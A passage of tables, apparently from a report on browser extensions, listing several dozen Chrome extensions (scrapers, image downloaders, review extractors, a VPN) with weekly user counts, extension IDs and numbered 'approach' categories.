WAPI - Send personalized messages 20,000 onohcnjmnndegfjgbfdfaeooceefedji 1
Entrar for Gmail™ 5,000 oolgnmaocjjdlacpbbajnbooghihekpp 5
Group exporter 2 19 opeikahlidceaoaghglikdpfdkmegklg 1
Keyword Finder-SEO keywords Tool 5,000 oppmgphiknonmjjoepbnafmbcdiamjdh 5
Search Engine Featuring ChatGPT - GPT Search 775 pbeiddaffccibkippoefblnmjfmmdmne 1, 5
Amazon Price History Tracker - AmzChart 737 pboiilknppcopllbjjcpdhadoacfeedk 5
Shopify Wise - Shopify analytics & Dropship tool 762 pckpnbdneenegpkodapaeifpgmneefjd 5
Vimeo™ Video Downloader Pro 70,000 penndbmahnpapepljikkjmakcobdahne 5
DealsUpp - Contact Saver for WA 2,000 pfomiledcpfnldnldlffdebbpjnhkbbl 1, 5
Profile Scraper - Leadboot 2,000 pgijefijihpjioibahpfadkabebenoel 1
-com Remove Background 105 pgomkcdpmifelmdhdgejgnjeehpkmdgl 1
EasyGood - Free Unlimited VPN Proxy 1,000 pgpcjennihmkbbpifnjkdpkagpaggfaa 5
FindNiche - AliExpress™ Data Exporter 114 pjjofiojigimijfomcffnpjlcceijohm 5
Share Preview Save to Social 419 pkbmlamidkenakbhhialhdmmkijkhdee 1, 3
Voice Remaker - The Best AI Generator 10,000 pnlgifbohdiadfjllfmmjadcgofbnpoi 1, 5
Pincase-Pinterest Video & Image Downloader 10,000 poomkmbickjilkojghldlelgjmgaabic 5
Ad Library - Ad Finder & Adspy Tool 30,000 ppbmlcfgohokdanfpeoanjcdclffjncg 5
YouTube Video Tags Summary with ChatGPT 908 ppfomhocaedogacikjldipgomjdjalol 1, 5

ExtensionsBox

Name Weekly active users Extension ID Approaches
Amazon Reviews Extractor 1,000 aapmfnbcggnbcghjipmpcngmflbjjfnb 1, 2
Target Images Downloader 100 adeimcdlolcpdkaapelfnacjjnclpgpb 2
Airbnb Images Downloader 433 alaclngadohenllpjadnmpkplkpdlkni 1, 2
eBay Reviews Extractor 200 amagdhmieghdldeiagobdhiebncjdjod 2
Lazada Images Downloader 363 bcfjlfilhmdhoepgffdgdmeefkmifooo 1, 2
Shopify2Woo - Shopify to WooCommerce 543 bfnieimjkglmfojnnlillkenhnehlfcj 1, 2
Group Extractor 3,000 bggmbldgnfhohniedfopliimbiakhjhj 1, 2
Shein Reviews Extractor - Scrape Data to CSV 388 bgoemjkklalleicedfflkkmnnlcflnmd 1, 2
Airbnb Reviews Extractor 86 bklllkankabebbiipcfkcnmcegekeagj 1, 2
eBay Images Downloader 863 bkpjjpjajaogephjblhpjdmjmpihpepm 1, 2
Indeed Scraper 2,000 bneijclffbjaigpohjfnfmjpnaadchdd 1, 2
Shein to Shopify CSV Exportor 130 cacbnoblnhdipbdoimjhkjoonmgihkec 1, 2
Justdial Scraper 1,000 ccnfadfagdjnaehnpgceocdgajgieinn 1, 2
AI Review Summarizer - Get ChatGPT Review Analysis in One Click 24 cefjlfachafjglgeechpnnigkpcehbgf 2
Booking Hotel Scraper 123 cgfklhalcnhpnkecicjabhmhlgekdfic 1, 2
Contact Extractor for wa 2,000 chhclfoeakpicniabophhhnnjfhahjki 2
AI Reviews Summary for Google Maps 17 cmkkchmnekbopphncohohdaehlgpmegi 2
AliExpress Images Downloader 938 cpdanjpcekhgkcijkifoiicadebljobn 1, 2
Shopy - Shopify Spy 2,000 dehlcjmoincicbhdnkbnmkeaiapljnld 1, 2
Profile Scraper for LinkedIn™ 473 dmonpchcmpmiehffgbkoimkmlfomgmbc 1, 2
Trustpilot Reviews Extractor 481 eikaihjegpcchpmnjaodjigdfjanoamn 1, 2
Indeed Review Extractor 17 ejmkpbellnnjbkbagmgabogfnbkcbnkb 1, 2
AliExpress Reviews Extractor 409 elcljdecpbphfholhckkchdocegggbli 1, 2
Etsy Reviews Extractor 306 fbbobebaplnpchmkidpicipacnogcjpk 2
Post Scraper 34 fcldaoddodeaompgigjhplaalfhgphfo 2
Images Downloader for WM 707 fdakeeindhklmojjbfjhgmpodngnpcfk 1, 2
Twitch Chat Downloader 132 fkcglcjlhbfbechmbmcajldcfkcpklng 1, 2
Costco Images Downloader 35 fpicpahbllamfleebhiieejmagmpfepi 1, 2
Etsy Images Downloader 1,000 gbihcigegealfmeefgplcpejjdcpenbo 2
Yelp Scraper 347 gbpkfnpijffepibabnledidempoaanff 2
Lazada Reviews Extractor 102 gcfjmciddjfnjccpgijpmphhphlfbpgl 1, 2
Shopee Reviews Extractor 484 gddchobpnbecooaebohmcamdfooapmfj 2
Comments Exporter for Ins 47 gdhcgkncekkhebpefefeeahnojclbgeg 1, 2
Wayfair Images Downloader 169 ggcepafcjdcadpepeedmlhnokcejdlal 2
Amazon Images Downloader 1,000 ggfhamjeclabnmkdooogdjibkiffdpec 1, 2
Shein Images Downloader 3,000 ghnnkkhikjclkpldkbdopbpcocpchhoi 1, 2
Reviews Extractor for WM 369 gidbpinngggcpgnncphjnfjkneodombd 2
Zillow Scraper - Agent & Property Export 308 gjhcnbnbclgoiggjlghgnnckfmbfnhbb 2
G2 Reviews Extractor 189 hdnlkdbboofooabecgohocmglocfgflo 1, 2
X Jobs Scraper 35 hillidkidahkkchnaiikkoafeaojkjip 1, 2
Booking Reviews Extractor